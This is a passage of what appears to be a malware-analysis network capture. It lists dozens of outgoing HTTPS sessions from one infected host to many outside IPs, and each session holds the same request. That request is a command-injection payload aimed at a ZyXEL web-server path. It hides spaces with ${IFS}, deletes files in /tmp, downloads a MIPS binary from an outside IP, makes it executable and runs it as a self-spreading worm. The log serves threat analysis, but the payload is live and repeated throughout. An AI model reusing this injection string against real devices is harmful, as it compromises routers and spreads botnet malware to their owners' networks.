                                                        Feb 2, 2024 06:21:24.225418091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7945192.168.2.143844662.226.124.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225430965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7946192.168.2.145250268.20.248.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225455999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7947192.168.2.1446936200.162.246.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225498915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7948192.168.2.1433808196.1.186.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225545883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7949192.168.2.143441688.118.127.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225575924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7950192.168.2.144585844.186.97.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225620985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7951192.168.2.1434856173.146.17.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225653887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7952192.168.2.14517722.126.244.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225675106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7953192.168.2.1437208178.11.0.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225735903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7954192.168.2.1435166160.127.120.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225773096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7955192.168.2.145095675.49.206.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225826979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7956192.168.2.145291693.118.197.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225848913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7957192.168.2.145067423.33.104.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225899935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7958192.168.2.144782069.108.155.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225944996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7959192.168.2.1452552121.106.128.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225979090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7960192.168.2.1459146173.237.157.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226041079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7961192.168.2.1440484149.201.171.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226082087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7962192.168.2.1433854175.42.96.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226118088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7963192.168.2.1459588167.127.46.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226157904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7964192.168.2.1446880165.31.179.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226205111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7965192.168.2.1446874169.0.138.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226241112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7966192.168.2.145282468.144.31.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226289034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7967192.168.2.144406275.134.144.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226326942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7968192.168.2.1446628203.3.8.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226360083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7969192.168.2.1446916163.24.125.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226391077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7970192.168.2.143368271.111.90.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226416111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7971192.168.2.1436916213.105.112.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226454973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7972192.168.2.143959098.218.19.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226516008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7973192.168.2.1451868124.59.222.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226561069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7974192.168.2.1453872161.244.106.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226586103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7975192.168.2.145274469.180.100.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226614952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7976192.168.2.1460132148.47.183.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226700068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7977192.168.2.145920093.209.170.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226741076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7978192.168.2.1455422163.189.234.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226783037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7979192.168.2.1442058158.197.59.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226831913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7980192.168.2.143281264.145.139.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226861000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7981192.168.2.1447334102.95.216.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226923943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7982192.168.2.145565446.33.100.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226963997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7983192.168.2.1450750168.46.42.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.226996899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7984192.168.2.1445056204.88.156.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227041006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7985192.168.2.1457458159.128.211.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227078915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7986192.168.2.1435600217.42.248.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227108955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7987192.168.2.143994439.230.93.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227139950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7988192.168.2.145191866.168.209.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227178097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7989192.168.2.1453728146.236.40.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227210999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7990192.168.2.1441926160.215.2.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227231026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7991192.168.2.1454622213.184.142.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227279902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7992192.168.2.1445290138.246.57.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227330923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7993192.168.2.1445266121.44.115.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227354050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7994192.168.2.145716296.133.154.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227411985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7995192.168.2.1446616179.179.30.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227449894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7996192.168.2.145712860.97.48.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227477074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7997192.168.2.146007239.199.213.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227526903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7998192.168.2.1449830197.6.101.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227583885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7999192.168.2.1442224137.2.25.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227607965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8000192.168.2.1432902110.11.90.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227680922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8001192.168.2.143444666.168.205.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227701902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8002192.168.2.145330654.75.204.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227740049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8003192.168.2.1440954200.121.203.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227771044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8004192.168.2.1443636150.204.195.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227837086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8005192.168.2.1434538147.164.29.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227874041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8006192.168.2.1438076202.119.30.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.227912903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8007192.168.2.144325614.69.135.247443
                                                        TimestampBytes transferredDirectionData
